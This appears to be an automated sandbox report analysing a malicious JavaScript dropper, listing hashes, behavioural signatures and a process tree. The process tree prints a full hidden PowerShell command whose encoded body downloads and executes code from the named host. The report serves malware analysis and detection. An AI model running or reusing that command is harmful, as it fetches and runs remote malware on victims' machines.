Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
06-09-2022 16:08
Static task
static1
Behavioral task
behavioral1
Sample
fqt145254.js
Resource
win7-20220812-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
fqt145254.js
Resource
win10v2004-20220812-en
windows10-2004-x64
6 signatures
150 seconds
General
-
Target
fqt145254.js
-
Size
286KB
-
MD5
23a177986f5397d5028a1dc587b465f5
-
SHA1
68085cb719054e73dd3c527578ad7f89960bf649
-
SHA256
d167ab99ec55cea50a5723c49dcbd0031ede7b21886b32e76bd011a11ee65acb
-
SHA512
d839b742825a94ad82fe7cf921cb6ac9c0962bae3f0e7b9be8c7598a4f7ff28ce6218f8860f49df3b405aa5428bbba9e3903edf1983a7dcbf9c33e07eee69ddd
-
SSDEEP
3072:qrjVJySRCL1ddImO3NwSa0wQwRCijyQL7oebGpTLW+B57wtB:qASkdIn9lpQL7oebGRLQB
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://freedompublishingbooks.com.au/index/
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2032 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2032 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1676 wrote to memory of 992 1676 wscript.exe 28 PID 1676 wrote to memory of 992 1676 wscript.exe 28 PID 1676 wrote to memory of 992 1676 wscript.exe 28 PID 992 wrote to memory of 2032 992 cmd.exe 30 PID 992 wrote to memory of 2032 992 cmd.exe 30 PID 992 wrote to memory of 2032 992 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fqt145254.js1⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pOwErShElL -NoP -w hIDdeN -eP BYPAsS -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAGQAbwBtAHAAdQBiAGwAaQBzAGgAaQBuAGcAYgBvAG8AawBzAC4AYwBvAG0ALgBhAHUALwBpAG4AZABlAHgALwAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErShElL -NoP -w hIDdeN -eP BYPAsS -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAGQAbwBtAHAAdQBiAGwAaQBzAGgAaQBuAGcAYgBvAG8AawBzAC4AYwBvAG0ALgBhAHUALwBpAG4AZABlAHgALwAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-